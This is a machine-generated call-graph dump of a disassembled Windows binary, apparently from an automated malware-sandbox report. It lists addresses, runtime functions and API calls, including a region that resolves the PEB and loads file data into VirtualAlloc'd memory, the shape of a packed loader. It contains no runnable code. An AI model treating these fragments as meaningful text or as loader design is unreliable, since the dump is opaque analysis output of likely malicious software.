99846->99873 99848 9e8dd3 99847->99848 99848->99846 99850 9e8ddc 99848->99850 99854 9a55d6 __fcloseall 83 API calls 99850->99854 99850->99872 99851 9e8e32 99852 9e8e36 99851->99852 99853 9e8e57 99851->99853 99856 9e8e43 99852->99856 99858 9a55d6 __fcloseall 83 API calls 99852->99858 99877 9e8c33 99853->99877 99854->99872 99859 9a55d6 __fcloseall 83 API calls 99856->99859 99856->99872 99858->99856 99859->99872 99860 9e8e85 99886 9e8eb5 99860->99886 99861 9e8e65 99863 9e8e72 99861->99863 99865 9a55d6 __fcloseall 83 API calls 99861->99865 99867 9a55d6 __fcloseall 83 API calls 99863->99867 99863->99872 99865->99863 99867->99872 99869 9e8ea0 99871 9a55d6 __fcloseall 83 API calls 99869->99871 99869->99872 99871->99872 99872->99338 99874 9e9029 __tzset_nolock _memmove 99873->99874 99875 9e9040 99873->99875 99874->99851 99876 9a5812 __fread_nolock 74 API calls 99875->99876 99876->99874 99878 9a594c _W_store_winword 58 API calls 99877->99878 99879 9e8c42 99878->99879 99880 9a594c _W_store_winword 58 API calls 99879->99880 99881 9e8c56 99880->99881 99882 9a594c _W_store_winword 58 API calls 99881->99882 99883 9e8c6a 99882->99883 99884 9e8f97 58 API calls 99883->99884 99885 9e8c7d 99883->99885 99884->99885 99885->99860 99885->99861 99890 9e8eca 99886->99890 99887 9e8f82 99915 9e91bf 99887->99915 99889 9e8c8f 74 API calls 99889->99890 99890->99887 99890->99889 99893 9e8e8c 99890->99893 99919 9e8d2b 74 API calls 99890->99919 99920 9e909c 80 API calls 99890->99920 99894 9e8f97 99893->99894 99895 9e8faa 99894->99895 99896 9e8fa4 99894->99896 99898 9a2f95 _free 58 API calls 99895->99898 99900 9e8fbb 99895->99900 99897 9a2f95 _free 58 API calls 99896->99897 99897->99895 99898->99900 99899 9e8e93 99899->99869 99902 9a55d6 99899->99902 99900->99899 99901 9a2f95 _free 58 API calls 99900->99901 99901->99899 99903 9a55e2 __wfsopen 99902->99903 99904 9a560e 99903->99904 99905 9a55f6 99903->99905 99907 9a6e4e __lock_file 59 API calls 99904->99907 99914 9a5606 __wfsopen 99904->99914 100002 9a8d68 58 API calls __getptd_noexit 99905->100002 99909 9a5620 99907->99909 99908 9a55fb 100003 9a8ff6 9 API calls __wcsicmp_l 99908->100003 99986 9a556a 99909->99986 99914->99869 99916 9e91cc 99915->99916 99917 9e91dd 99915->99917 99921 9a4a93 99916->99921 99917->99893 99919->99890 99920->99890 99922 9a4a9f __wfsopen 99921->99922 99923 9a4acd __wfsopen 99922->99923 99924 9a4abd 99922->99924 99925 9a4ad5 99922->99925 99923->99917 99946 9a8d68 58 API calls __getptd_noexit 99924->99946 99927 9a6e4e __lock_file 59 API calls 99925->99927 99929 9a4adb 99927->99929 99928 9a4ac2 99947 9a8ff6 9 API calls __wcsicmp_l 99928->99947 99934 9a493a 99929->99934 99936 9a4949 99934->99936 99941 9a4967 99934->99941 99935 9a4957 99977 9a8d68 58 API calls __getptd_noexit 99935->99977 99936->99935 99936->99941 99943 9a4981 _memmove 99936->99943 99938 9a495c 99978 9a8ff6 9 API calls __wcsicmp_l 99938->99978 99948 9a4b0d LeaveCriticalSection LeaveCriticalSection _fseek 99941->99948 99943->99941 99944 9a4916 __flsbuf 58 API calls 99943->99944 99949 9adac6 99943->99949 99979 9a4c6d 99943->99979 99985 9ab05e 78 API calls 5 library calls 99943->99985 99944->99943 99946->99928 99947->99923 99948->99923 99950 9adad2 __wfsopen 99949->99950 99951 9adadf 99950->99951 99952 9adaf6 99950->99952 99953 9a8d34 __lseeki64 58 API calls 99951->99953 99954 9adb95 99952->99954 99956 9adb0a 99952->99956 99955 9adae4 99953->99955 99957 9a8d34 __lseeki64 58 API calls 99954->99957 99959 9a8d68 _free 58 API calls 99955->99959 99960 9adb28 99956->99960 99961 9adb32 99956->99961 99958 9adb2d 99957->99958 99964 9a8d68 _free 58 API calls 99958->99964 99972 9adaeb __wfsopen 99959->99972 99963 9a8d34 __lseeki64 58 API calls 99960->99963 99962 9ad446 ___lock_fhandle 59 API calls 99961->99962 99965 9adb38 99962->99965 99963->99958 99966 9adba1 99964->99966 99967 9adb4b 99965->99967 99968 9adb5e 99965->99968 99969 9a8ff6 __wcsicmp_l 9 API calls 99966->99969 99970 9adbb5 __write_nolock 76 API calls 99967->99970 99971 9a8d68 _free 58 API calls 99968->99971 99969->99972 99973 9adb57 99970->99973 99974 9adb63 99971->99974 99972->99943 99976 9adb8d __write LeaveCriticalSection 99973->99976 99975 9a8d34 __lseeki64 58 API calls 99974->99975 99975->99973 99976->99972 99977->99938 99978->99941 99980 9a4ca4 99979->99980 99981 9a4c80 99979->99981 99980->99943 99981->99980 99982 9a4916 __flsbuf 58 API calls 99981->99982 99983 9a4c9d 99982->99983 99984 9adac6 __write 78 API calls 99983->99984 99984->99980 99985->99943 99987 9a5579 99986->99987 99988 9a558d 99986->99988 100035 9a8d68 58 API calls __getptd_noexit 99987->100035 99990 9a5589 99988->99990 99992 9a4c6d __flush 78 API calls 99988->99992 100004 9a5645 LeaveCriticalSection LeaveCriticalSection _fseek 99990->100004 99991 9a557e 100036 9a8ff6 9 API calls __wcsicmp_l 99991->100036 99994 9a5599 99992->99994 100005 9b0dc7 99994->100005 99997 9a4916 __flsbuf 58 API calls 99998 9a55a7 99997->99998 100009 9b0c52 99998->100009 100000 9a55ad 100000->99990 100001 9a2f95 _free 58 API calls 100000->100001 100001->99990 100002->99908 100003->99914 100004->99914 100006 9b0dd4 100005->100006 100008 9a55a1 100005->100008 100007 9a2f95 _free 58 API calls 100006->100007 100006->100008 100007->100008 100008->99997 100010 9b0c5e __wfsopen 100009->100010 100011 9b0c6b 100010->100011 100012 9b0c82 100010->100012 100061 9a8d34 58 API calls __getptd_noexit 100011->100061 100014 9b0d0d 100012->100014 100015 9b0c92 100012->100015 100066 9a8d34 58 API calls __getptd_noexit 100014->100066 100018 9b0cba 100015->100018 100019 9b0cb0 100015->100019 100017 9b0c70 100062 9a8d68 58 API calls __getptd_noexit 100017->100062 100037 9ad446 100018->100037 100063 9a8d34 58 API calls __getptd_noexit 100019->100063 100023 9b0cb5 100067 9a8d68 58 API calls __getptd_noexit 100023->100067 100025 9b0cc0 100027 9b0cde 100025->100027 100028 9b0cd3 100025->100028 100026 9b0d19 100068 9a8ff6 9 API calls __wcsicmp_l 100026->100068 100064 9a8d68 58 API calls __getptd_noexit 100027->100064 100046 9b0d2d 100028->100046 100031 9b0c77 __wfsopen 100031->100000 100033 9b0cd9 100065 9b0d05 LeaveCriticalSection __unlock_fhandle 100033->100065 100035->99991 100036->99990 100038 9ad452 __wfsopen 100037->100038 100039 9ad4a1 EnterCriticalSection 100038->100039 100041 9a9e4b __lock 58 API calls 100038->100041 100040 9ad4c7 __wfsopen 100039->100040 100040->100025 100042 9ad477 100041->100042 100045 9ad48f 100042->100045 100069 9aa06b InitializeCriticalSectionAndSpinCount 100042->100069 100070 9ad4cb LeaveCriticalSection _doexit 100045->100070 100071 9ad703 100046->100071 100048 9b0d91 100084 9ad67d 59 API calls 2 library calls 100048->100084 100050 9b0d3b 100050->100048 100051 9ad703 __chsize_nolock 58 API calls 100050->100051 100060 9b0d6f 100050->100060 100054 9b0d66 100051->100054 100052 9ad703 __chsize_nolock 58 API calls 100055 9b0d7b FindCloseChangeNotification 100052->100055 100053 9b0d99 100056 9b0dbb 100053->100056 100085 9a8d47 58 API calls 2 library calls 100053->100085 100057 9ad703 __chsize_nolock 58 API calls 100054->100057 100055->100048 100058 9b0d87 GetLastError 100055->100058 100056->100033 100057->100060 100058->100048 100060->100048 100060->100052 100061->100017 100062->100031 100063->100023 100064->100033 100065->100031 100066->100023 100067->100026 100068->100031 100069->100045 100070->100039 100072 9ad70e 100071->100072 100074 9ad723 100071->100074 100073 9a8d34 __lseeki64 58 API calls 100072->100073 100075 9ad713 100073->100075 100076 9a8d34 __lseeki64 58 API calls 100074->100076 100078 9ad748 100074->100078 100077 9a8d68 _free 58 API calls 100075->100077 100079 9ad752 100076->100079 100080 9ad71b 100077->100080 100078->100050 100081 9a8d68 _free 58 API calls 100079->100081 100080->100050 100082 9ad75a 100081->100082 100083 9a8ff6 __wcsicmp_l 9 API calls 100082->100083 100083->100080 100084->100053 100085->100056 100087 9b1b90 __write_nolock 100086->100087 100088 9a09e2 GetLongPathNameW 100087->100088 100089 987d2c 59 API calls 100088->100089 100090 98741d 100089->100090 100091 98716b 100090->100091 100092 9877c7 59 API calls 100091->100092 100093 98717d 100092->100093 100094 9848ae 60 API calls 100093->100094 100095 987188 100094->100095 100096 987193 100095->100096 100101 9becae 100095->100101 100097 983f84 59 API calls 100096->100097 100099 98719f 100097->100099 100138 9834c2 100099->100138 100103 9becc8 100101->100103 100144 987a68 61 API calls 100101->100144 100102 9871b2 Mailbox 100102->99092 100105 984f3d 136 API calls 100104->100105 100106 9869ef 100105->100106 100107 9be45a 100106->100107 100108 984f3d 136 API calls 100106->100108 100109 9e97e5 122 API calls 100107->100109 100111 986a03 100108->100111 100110 9be46f 100109->100110 100112 9be473 100110->100112 100113 9be490 100110->100113 100111->100107 100114 986a0b 100111->100114 100115 984faa 84 API calls 100112->100115 100116 9a0ff6 Mailbox 59 API calls 100113->100116 100117 9be47b 100114->100117 100118 986a17 100114->100118 100115->100117 100137 9be4d5 Mailbox 100116->100137 100261 9e4534 90 API calls _wprintf 100117->100261 100145 986bec 100118->100145 100121 9be489 100121->100113 100123 9be689 100124 9a2f95 _free 58 API calls 100123->100124 100125 9be691 100124->100125 100126 984faa 84 API calls 100125->100126 100131 9be69a 100126->100131 100130 9a2f95 _free 58 API calls 100130->100131 100131->100130 100133 984faa 84 API calls 100131->100133 100263 9dfcb1 89 API calls 4 library calls 100131->100263 100133->100131 100134 987f41 59 API calls 100134->100137 100137->100123 100137->100131 100137->100134 100238 9dfc4d 100137->100238 100241 9e7621 100137->100241 100247 98766f 100137->100247 100255 9874bd 100137->100255 100262 9dfb6e 61 API calls 2 library calls 100137->100262 100139 9834d4 100138->100139 100143 9834f3 _memmove 100138->100143 100141 9a0ff6 Mailbox 59 API calls 100139->100141 100140 9a0ff6 Mailbox 59 API calls 100142 98350a 100140->100142 100141->100143 100142->100102 100143->100140 100144->100101 100146 9be847 100145->100146 100147 986c15 100145->100147 100336 9dfcb1 89 API calls 4 library calls 100146->100336 100269 985906 60 API calls Mailbox 100147->100269 100150 9be85a 100337 9dfcb1 89 API calls 4 library calls 100150->100337 100151 986c37 100270 985956 67 API calls 100151->100270 100153 986c4c 100153->100150 100154 986c54 100153->100154 100156 9877c7 59 API calls 100154->100156 100158 986c60 100156->100158 100157 9be876 100160 986cc1 100157->100160 100271 9a0b9b 60 API calls __write_nolock 100158->100271 100162 9be889 100160->100162 100163 986ccf 100160->100163 100161 986c6c 100164 9877c7 59 API calls 100161->100164 100165 985dcf CloseHandle 100162->100165 100166 9877c7 59 API calls 100163->100166 100168 986c78 100164->100168 100169 9be895 100165->100169 100167 986cd8 100166->100167 100170 9877c7 59 API calls 100167->100170 100171 9848ae 60 API calls 100168->100171 100172 984f3d 136 API calls 100169->100172 100173 986ce1 100170->100173 100174 986c86 100171->100174 100175 9be8b1 100172->100175 100274 9846f9 100173->100274 100272 9859b0 ReadFile SetFilePointerEx 100174->100272 100176 9be8da 100175->100176 100179 9e97e5 122 API calls 100175->100179 100338 9dfcb1 89 API calls 4 library calls 100176->100338 100183 9be8cd 100179->100183 100180 986cf8 100184 987c8e 59 API calls 100180->100184 100182 986cb2 100273 985c4e SetFilePointerEx SetFilePointerEx 100182->100273 100187 9be8f6 100183->100187 100188 9be8d5 100183->100188 100189 986d09 SetCurrentDirectoryW 100184->100189 100185 9be8f1 100193 986e6c Mailbox 100185->100193 100191 984faa 84 API calls 100187->100191 100190 984faa 84 API calls 100188->100190 100195 986d1c Mailbox 100189->100195 100190->100176 100192 9be8fb 100191->100192 100194 9a0ff6 Mailbox 59 API calls 100192->100194 100264 985934 100193->100264 100200 9be92f 100194->100200 100197 9a0ff6 Mailbox 59 API calls 100195->100197 100199 986d2f 100197->100199 100198 983bcd 100198->98959 100198->98982 100201 98538e 59 API calls 100199->100201 100202 98766f 59 API calls 100200->100202 100210 986d3a Mailbox __NMSG_WRITE 100201->100210 100234 9be978 Mailbox 100202->100234 100203 986e47 100332 985dcf 100203->100332 100205 9beb69 100341 9e7581 59 API calls Mailbox 100205->100341 100207 986e53 SetCurrentDirectoryW 100207->100193 100210->100203 100220 9bebfa 100210->100220 100222 987f41 59 API calls 100210->100222 100225 9bec02 100210->100225 100325 9859cd 67 API calls _wcscpy 100210->100325 100326 9870bd GetStringTypeW 100210->100326 100327 98702c 60 API calls __wcsnicmp 100210->100327 100328 98710a GetStringTypeW __NMSG_WRITE 100210->100328 100329 9a387d GetStringTypeW _iswctype 100210->100329 100330 986a3c 165 API calls 3 library calls 100210->100330 100331 987373 59 API calls Mailbox 100210->100331 100211 9beb8b 100342 9ef835 59 API calls 2 library calls 100211->100342 100214 9beb98 100215 9a2f95 _free 58 API calls 100214->100215 100215->100193 100218 98766f 59 API calls 100218->100234 100219 9bec1b 100219->100203 100344 9dfb07 59 API calls 4 library calls 100220->100344 100222->100210 100345 9dfcb1 89 API calls 4 library calls 100225->100345 100227 9dfc4d 59 API calls 100227->100234 100228 987f41 59 API calls 100228->100234 100229 9e7621 59 API calls 100229->100234 100232 9bebbb 100343 9dfcb1 89 API calls 4 library calls 100232->100343 100234->100205 100234->100218 100234->100227 100234->100228 100234->100229 100234->100232 100339 9dfb6e 61 API calls 2 library calls 100234->100339 100340 987373 59 API calls Mailbox 100234->100340 100235 9bebd4 100236 9a2f95 _free 58 API calls 100235->100236 100237 9bebe7 100236->100237 100237->100193 100239 9a0ff6 Mailbox 59 API calls 100238->100239 100240 9dfc7d _memmove 100239->100240 100240->100137 100242 9e762c 100241->100242 100243 9a0ff6 Mailbox 59 API calls 100242->100243 100244 9e7643 100243->100244 100245 9e7652 100244->100245 100246 987f41 59 API calls 100244->100246 100245->100137 100246->100245 100248 98770f 100247->100248 100251 987682 _memmove 100247->100251 100250 9a0ff6 Mailbox 59 API calls 100248->100250 100249 9a0ff6 Mailbox 59 API calls 100252 987689 100249->100252 100250->100251 100251->100249 100253 9a0ff6 Mailbox 59 API calls 100252->100253 100254 9876b2 100252->100254 100253->100254 100254->100137 100256 9874d0 100255->100256 100258 98757e 100255->100258 100257 9a0ff6 Mailbox 59 API calls 100256->100257 100260 987502 100256->100260 100257->100260 100258->100137 100259 9a0ff6 59 API calls Mailbox 100259->100260 100260->100258 100260->100259 100261->100121 100262->100137 100263->100131 100265 985dcf CloseHandle 100264->100265 100266 98593c Mailbox 100265->100266 100267 985dcf CloseHandle 100266->100267 100268 98594b 100267->100268 100268->100198 100269->100151 100270->100153 100271->100161 100272->100182 100273->100160 100275 9877c7 59 API calls 100274->100275 100276 98470f 100275->100276 100277 9877c7 59 API calls 100276->100277 100278 984717 100277->100278 100279 9877c7 59 API calls 100278->100279 100280 98471f 100279->100280 100281 9877c7 59 API calls 100280->100281 100282 984727 100281->100282 100283 9bd8fb 100282->100283 100284 98475b 100282->100284 100285 9881a7 59 API calls 100283->100285 100286 9879ab 59 API calls 100284->100286 100287 9bd904 100285->100287 100288 984769 100286->100288 100289 987eec 59 API calls 100287->100289 100290 987e8c 59 API calls 100288->100290 100292 98479e 100289->100292 100291 984773 100290->100291 100291->100292 100293 9879ab 59 API calls 100291->100293 100294 9847de 100292->100294 100296 9847bd 100292->100296 100307 9bd924 100292->100307 100297 984794 100293->100297 100346 9879ab 100294->100346 100298 987b52 59 API calls 100296->100298 100301 987e8c 59 API calls 100297->100301 100302 9847c7 100298->100302 100299 9847ef 100303 984801 100299->100303 100305 9881a7 59 API calls 100299->100305 100300 9bd9f4 100304 987d2c 59 API calls 100300->100304 100301->100292 100302->100294 100309 9879ab 59 API calls 100302->100309 100306 984811 100303->100306 100310 9881a7 59 API calls 100303->100310 100314 9bd9b1 100304->100314 100305->100303 100308 984818 100306->100308 100312 9881a7 59 API calls 100306->100312 100307->100300 100311 9bd9dd 100307->100311 100315 9bd95b 100307->100315 100313 9881a7 59 API calls 100308->100313 100322 98481f Mailbox 100308->100322 100309->100294 100310->100306 100311->100300 100317 9bd9c8 100311->100317 100312->100308 100313->100322 100314->100294 100320 987b52 59 API calls 100314->100320 100359 987a84 59 API calls 2 library calls 100314->100359 100316 9bd9b9 100315->100316 100323 9bd9a4 100315->100323 100318 987d2c 59 API calls 100316->100318 100319 987d2c 59 API calls 100317->100319 100318->100314 100319->100314 100320->100314 100322->100180 100324 987d2c 59 API calls 100323->100324 100324->100314 100325->100210 100326->100210 100327->100210 100328->100210 100329->100210 100330->100210 100331->100210 100333 985de8 100332->100333 100334 985dd9 100332->100334 100333->100334 100335 985ded CloseHandle 100333->100335 100334->100207 100335->100334 100336->100150 100337->100157 100338->100185 100339->100234 100340->100234 100341->100211 100342->100214 100343->100235 100344->100225 100345->100219 100347 9879ba 100346->100347 100348 987a17 100346->100348 100347->100348 100350 9879c5 100347->100350 100349 987e8c 59 API calls 100348->100349 100355 9879e8 _memmove 100349->100355 100351 9879e0 100350->100351 100352 9bef32 100350->100352 100360 988087 59 API calls Mailbox 100351->100360 100354 988189 59 API calls 100352->100354 100356 9bef3c 100354->100356 100355->100299 100357 9a0ff6 Mailbox 59 API calls 100356->100357 100358 9bef5c 100357->100358 100359->100314 100360->100355 100362 986ef5 100361->100362 100366 987009 100361->100366 100363 9a0ff6 Mailbox 59 API calls 100362->100363 100362->100366 100365 986f1c 100363->100365 100364 9a0ff6 Mailbox 59 API calls 100370 986f91 100364->100370 100365->100364 100366->99098 100368 9874bd 59 API calls 100368->100370 100370->100366 100370->100368 100371 98766f 59 API calls 100370->100371 100374 9863a0 94 API calls 2 library calls 100370->100374 100375 9d6ac9 59 API calls Mailbox 100370->100375 100371->100370 100372->99100 100373->99102 100374->100370 100375->100370 100376->99116 100377->99117 100379 9bd638 100378->100379 100380 984227 100378->100380 100379->100380 100381 9bd641 DestroyIcon 100379->100381 100380->99126 100404 9e3226 62 API calls _W_store_winword 100380->100404 100381->100380 100383 984129 100382->100383 100384 984200 Mailbox 100382->100384 100405 987b76 100383->100405 100384->99129 100387 9bd5dd LoadStringW 100391 9bd5f7 100387->100391 100388 984144 100389 987d2c 59 API calls 100388->100389 100390 984159 100389->100390 100390->100391 100392 98416a 100390->100392 100393 987c8e 59 API calls 100391->100393 100394 984174 100392->100394 100395 984205 100392->100395 100398 9bd601 100393->100398 100396 987c8e 59 API calls 100394->100396 100397 9881a7 59 API calls 100395->100397 100400 98417e _memset _wcscpy 100396->100400 100397->100400 100399 987e0b 59 API calls 100398->100399 100398->100400 100401 9bd623 100399->100401 100402 9841e6 Shell_NotifyIconW 100400->100402 100403 987e0b 59 API calls 100401->100403 100402->100384 100403->100400 100404->99126 100406 9a0ff6 Mailbox 59 API calls 100405->100406 100407 987b9b 100406->100407 100408 988189 59 API calls 100407->100408 100409 984137 100408->100409 100409->100387 100409->100388 100411 98e59d 100410->100411 100412 98e5b1 100410->100412 100509 98e060 341 API calls 2 library calls 100411->100509 100510 9ea0b5 89 API calls 4 library calls 100412->100510 100415 98e5a8 100415->99206 100416 9c3ece 100416->100416 100418 98e835 100417->100418 100419 9c3ed3 100418->100419 100423 98e89f 100418->100423 100432 98e8f9 100418->100432 100512 98a000 100419->100512 100420 98ebe1 100424 9877c7 59 API calls 100420->100424 100449 98ead0 Mailbox 100420->100449 100422 9c3ee8 100422->100449 100535 9ea0b5 89 API calls 4 library calls 100422->100535 100423->100420 100426 9877c7 59 API calls 100423->100426 100423->100432 100427 9c3f67 100424->100427 100428 9c3f2e 100426->100428 100429 9a2f80 __cinit 67 API calls 100427->100429 100430 9a2f80 __cinit 67 API calls 100428->100430 100429->100449 100430->100432 100431 9c3f50 100431->99206 100432->100420 100432->100431 100435 98eaba 100432->100435 100432->100449 100433 988620 69 API calls 100433->100449 100435->100449 100536 9ea0b5 89 API calls 4 library calls 100435->100536 100438 98f2f5 100540 9ea0b5 89 API calls 4 library calls 100438->100540 100440 98a000 341 API calls 100440->100449 100441 9c424f 100441->99206 100442 988ea0 59 API calls 100442->100449 100444 9ea0b5 89 API calls 100444->100449 100448 98ebd8 100448->99206 100449->100433 100449->100438 100449->100440 100449->100442 100449->100444 100449->100448 100511 9880d7 59 API calls 2 library calls 100449->100511 100537 9d7405 59 API calls 100449->100537 100538 9fc8d7 341 API calls 100449->100538 100539 9fb851 341 API calls Mailbox 100449->100539 100541 989df0 59 API calls Mailbox 100449->100541 100542 9f96db 341 API calls Mailbox 100449->100542 100451 98f61a 100450->100451 100452 98f7b0 100450->100452 100453 9c4848 100451->100453 100454 98f626 100451->100454 100455 987f41 59 API calls 100452->100455 100640 9fbf80 341 API calls Mailbox 100453->100640 100638 98f3f0 341 API calls 2 library calls 100454->100638 100462 98f6ec Mailbox 100455->100462 100458 98f790 100458->99206 100459 9c4856 100459->100458 100641 9ea0b5 89 API calls 4 library calls 100459->100641 100461 98f65d 100461->100458 100461->100459 100461->100462 100464 98f743 100462->100464 100465 984faa 84 API calls 100462->100465 100549 9fe237 100462->100549 100552 9e3e73 100462->100552 100555 9ecde5 100462->100555 100635 9fe24b 100462->100635 100464->100458 100639 989df0 59 API calls Mailbox 100464->100639 100465->100464 100470->99206 100471->99206 100472->99136 100473->99141 100474->99206 100475->99143 100476->99143 100477->99143 100478->99206 100479->99206 100480->99206 100482 9899ab 100481->100482 100483 9899b1 100481->100483 100482->99206 100484 9bf9fc __i64tow 100483->100484 100485 9899f9 100483->100485 100489 9899b7 __itow 100483->100489 100490 9bf903 100483->100490 100856 9a38d8 83 API calls 4 library calls 100485->100856 100488 9a0ff6 Mailbox 59 API calls 100491 9899d1 100488->100491 100489->100488 100492 9bf97b Mailbox _wcscpy 100490->100492 100493 9a0ff6 Mailbox 59 API calls 100490->100493 100491->100482 100494 987f41 59 API calls 100491->100494 100857 9a38d8 83 API calls 4 library calls 100492->100857 100495 9bf948 100493->100495 100494->100482 100496 9a0ff6 Mailbox 59 API calls 100495->100496 100497 9bf96e 100496->100497 100497->100492 100498 987f41 59 API calls 100497->100498 100498->100492 100499->99206 100500->99206 100501->99206 100502->99191 100503->99191 100504->99191 100505->99191 100506->99191 100507->99191 100508->99191 100509->100415 100510->100416 100511->100449 100513 98a01f 100512->100513 100527 98a04d Mailbox 100512->100527 100514 9a0ff6 Mailbox 59 API calls 100513->100514 100514->100527 100515 9a2f80 67 API calls __cinit 100515->100527 100516 98b5d5 100517 9881a7 59 API calls 100516->100517 100529 98a1b7 100517->100529 100518 9877c7 59 API calls 100518->100527 100519 9a0ff6 59 API calls Mailbox 100519->100527 100523 9c047f 100545 9ea0b5 89 API calls 4 library calls 100523->100545 100526 9881a7 59 API calls 100526->100527 100527->100515 100527->100516 100527->100518 100527->100519 100527->100523 100527->100526 100527->100529 100530 9d7405 59 API calls 100527->100530 100531 9c0e00 100527->100531 100533 98a6ba 100527->100533 100534 98b5da 100527->100534 100543 98ca20 341 API calls 2 library calls 100527->100543 100544 98ba60 60 API calls Mailbox 100527->100544 100528 9c048e 100528->100422 100529->100422 100530->100527 100547 9ea0b5 89 API calls 4 library calls 100531->100547 100546 9ea0b5 89 API calls 4 library calls 100533->100546 100548 9ea0b5 89 API calls 4 library calls 100534->100548 100535->100449 100536->100449 100537->100449 100538->100449 100539->100449 100540->100441 100541->100449 100542->100449 100543->100527 100544->100527 100545->100528 100546->100529 100547->100534 100548->100529 100642 9fcdf1 100549->100642 100551 9fe247 100551->100464 100732 9e4696 GetFileAttributesW 100552->100732 100556 9877c7 59 API calls 100555->100556 100557 9ece1a 100556->100557 100558 9877c7 59 API calls 100557->100558 100559 9ece23 100558->100559 100560 9ece37 100559->100560 100845 989c9c 59 API calls 100559->100845 100562 989997 84 API calls 100560->100562 100563 9ece54 100562->100563 100564 9ece76 100563->100564 100565 9ecf55 100563->100565 100576 9ecf85 Mailbox 100563->100576 100566 989997 84 API calls 100564->100566 100567 984f3d 136 API calls 100565->100567 100568 9ece82 100566->100568 100569 9ecf69 100567->100569 100570 9881a7 59 API calls 100568->100570 100571 9ecf81 100569->100571 100574 984f3d 136 API calls 100569->100574 100573 9ece8e 100570->100573 100572 9877c7 59 API calls 100571->100572 100571->100576 100575 9ecfb6 100572->100575 100578 9eced4 100573->100578 100579 9ecea2 100573->100579 100574->100571 100577 9877c7 59 API calls 100575->100577 100576->100464 100580 9ecfbf 100577->100580 100582 989997 84 API calls 100578->100582 100581 9881a7 59 API calls 100579->100581 100583 9877c7 59 API calls 100580->100583 100584 9eceb2 100581->100584 100585 9ecee1 100582->100585 100586 9ecfc8 100583->100586 100587 987e0b 59 API calls 100584->100587 100588 9881a7 59 API calls 100585->100588 100589 9877c7 59 API calls 100586->100589 100590 9ecebc 100587->100590 100591 9eceed 100588->100591 100592 9ecfd1 100589->100592 100593 989997 84 API calls 100590->100593 100846 9e4cd3 GetFileAttributesW 100591->100846 100595 989997 84 API calls 100592->100595 100597 9ecec8 100593->100597 100596 9ecfde 100595->100596 100599 9846f9 59 API calls 100596->100599 100600 987c8e 59 API calls 100597->100600 100598 9ecef6 100601 9ecf09 100598->100601 100602 987b52 59 API calls 100598->100602 100603 9ecff9 100599->100603 100600->100578 100604 989997 84 API calls 100601->100604 100610 9ecf0f 100601->100610 100602->100601 100606 9ecf36 100604->100606 100610->100576 100636 9fcdf1 130 API calls 100635->100636 100637 9fe25b 100636->100637 100637->100464 100638->100461 100639->100464 100640->100459 100641->100458 100643 989997 84 API calls 100642->100643 100644 9fce2e 100643->100644 100658 9fce75 Mailbox 100644->100658 100680 9fdab9 100644->100680 100646 9fd242 100719 9fdbdc 92 API calls Mailbox 100646->100719 100649 9fd251 100650 9fd0db 100649->100650 100651 9fd25d 100649->100651 100693 9fcc82 100650->100693 100651->100658 100652 989997 84 API calls 100657 9fcec6 Mailbox 100652->100657 100657->100652 100657->100658 100667 9fd0cd 100657->100667 100712 9ef835 59 API calls 2 library calls 100657->100712 100713 9fd2f3 61 API calls 2 library calls 100657->100713 100658->100551 100659 9fd114 100708 9a0e48 100659->100708 100662 9fd12e 100663 9fd147 100667->100646 100667->100650 100681 987faf 59 API calls 100680->100681 100682 9fdad4 CharLowerBuffW 100681->100682 100721 9df658 100682->100721 100686 9877c7 59 API calls 100687 9fdb0d 100686->100687 100688 9879ab 59 API calls 100687->100688 100689 9fdb24 100688->100689 100690 987e8c 59 API calls 100689->100690 100691 9fdb30 Mailbox 100690->100691 100692 9fdb6c Mailbox 100691->100692 100728 9fd2f3 61 API calls 2 library calls 100691->100728 100692->100657 100694 9fcc9d 100693->100694 100698 9fccf2 100693->100698 100695 9a0ff6 Mailbox 59 API calls 100694->100695 100696 9fccbf 100695->100696 100697 9a0ff6 Mailbox 59 API calls 100696->100697 100696->100698 100697->100696 100699 9fdd64 100698->100699 100700 9fdf8d Mailbox 100699->100700 100707 9fdd87 _strcat _wcscpy __NMSG_WRITE 100699->100707 100700->100659 100701 989c9c 59 API calls 100701->100707 100702 989d46 59 API calls 100702->100707 100703 989cf8 59 API calls 100703->100707 100704 989997 84 API calls 100704->100707 100705 9a594c 58 API calls _W_store_winword 100705->100707 100707->100700 100707->100701 100707->100702 100707->100703 100707->100704 100707->100705 100731 9e5b29 61 API calls 2 library calls 100707->100731 100709 9a0e5d 100708->100709 100710 9a0ef5 VirtualAlloc 100709->100710 100711 9a0ec3 100709->100711 100710->100711 100711->100662 100711->100663 100712->100657 100713->100657 100719->100649 100722 9df683 __NMSG_WRITE 100721->100722 100724 9df6b8 100722->100724 100726 9df769 100722->100726 100727 9df6c2 100722->100727 100724->100727 100729 987a24 61 API calls 100724->100729 100726->100727 100730 987a24 61 API calls 100726->100730 100727->100686 100727->100691 100728->100692 100729->100724 100730->100726 100731->100707 100733 9e46b1 FindFirstFileW 100732->100733 100735 9e3e7a 100732->100735 100734 9e46c6 FindClose 100733->100734 100733->100735 100734->100735 100735->100464 100845->100560 100846->100598 100856->100489 100857->100484 100859 987bbf 100858->100859 100863 987be5 _memmove 100858->100863 100860 9a0ff6 Mailbox 59 API calls 100859->100860 100859->100863 100861 987c34 100860->100861 100862 9a0ff6 Mailbox 59 API calls 100861->100862 100862->100863 100863->99215 100864->99216 100865 222295b 100866 2222962 100865->100866 100867 2222a00 100866->100867 100868 222296a 100866->100868 100885 22232b0 9 API calls 100867->100885 100872 2222610 100868->100872 100871 22229e7 100873 2220000 GetPEB 100872->100873 100882 22226af 100873->100882 100875 22226e0 CreateFileW 100878 22226ed 100875->100878 100875->100882 100876 2222709 VirtualAlloc 100877 222272a ReadFile 100876->100877 100876->100878 100877->100878 100881 2222748 VirtualAlloc 100877->100881 100879 222290a 100878->100879 100880 22228fc VirtualFree 100878->100880 100879->100871 100880->100879 100881->100878 100881->100882 100882->100876 100882->100878 100883 2222810 FindCloseChangeNotification 100882->100883 100884 2222820 VirtualFree 100882->100884 100886 2223520 GetPEB 100882->100886 100883->100882 100884->100882 100885->100871 100887 222354a 100886->100887 100887->100875 100888 9c0226 100894 98ade2 Mailbox 100888->100894 100890 9c0c86 100902 9d66f4 59 API calls Mailbox 100890->100902 100892 9c0c8f 100894->100890 100894->100892 100895 9c00e0 VariantClear 100894->100895 100896 98b6c1 100894->100896 100898 9fe237 130 API calls 100894->100898 100899 989df0 59 API calls Mailbox 100894->100899 100900 9d7405 59 API calls 100894->100900 100895->100894 100901 9ea0b5 89 API calls 4 library calls 100896->100901 100898->100894 100899->100894 100900->100894 100901->100890 100902->100892 100903 983633 100904 98366a 100903->100904 100905 983688 100904->100905 100906 9836e7 100904->100906 100944 9836e5 100904->100944 